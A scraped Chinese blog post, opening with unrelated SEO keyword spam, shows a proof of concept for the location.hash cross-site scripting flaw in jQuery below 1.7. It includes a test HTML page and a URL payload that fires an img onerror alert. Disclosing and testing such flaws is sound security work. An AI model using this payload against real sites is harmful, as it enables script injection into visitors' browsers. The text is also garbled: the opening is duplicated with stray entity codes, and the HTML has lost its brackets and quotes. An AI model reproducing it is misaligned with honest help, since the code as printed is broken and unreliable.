wordpress 附件下载插件,上海整站优化公司,h5制作的软件,网站建设与运营的收入来源jquery下载地址#xff1a;https://code.jquery.com/jquery/ 影响范围#xff1a; 版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷#xff0c;可能导致LOCATION.HASH跨站漏洞
已测试成功版本#xff1a; jquery-1.6.min.js#xff0c;jquery-1.6.1.min…
jquery下载地址https://code.jquery.com/jquery/ 影响范围 版本低于1.7的jQuery过滤用户输入数据所使用的正则表达式存在缺陷可能导致LOCATION.HASH跨站漏洞
已测试成功版本 jquery-1.6.min.jsjquery-1.6.1.min.jsjquery-1.6.2.min.js jquery-1.5所有版本 jquery-1.4所有版本 jquery-1.3所有版本 jquery-1.2所有版本
测试
启动nginx并建立index.html页面内容如下
漏洞发现者给的测试代码
html
head titleJQuery-xss-test/title script srchttps://code.jquery.com/jquery-1.6.1.min.js/script script $(function(){ try { $(location.hash) } catch(e) {} }) /script
/head
body Jquery xss test.
/body
/html
访问地址
http://localhost/#img src/ οnerrοralert(/F4ckTeam/)
测试截图
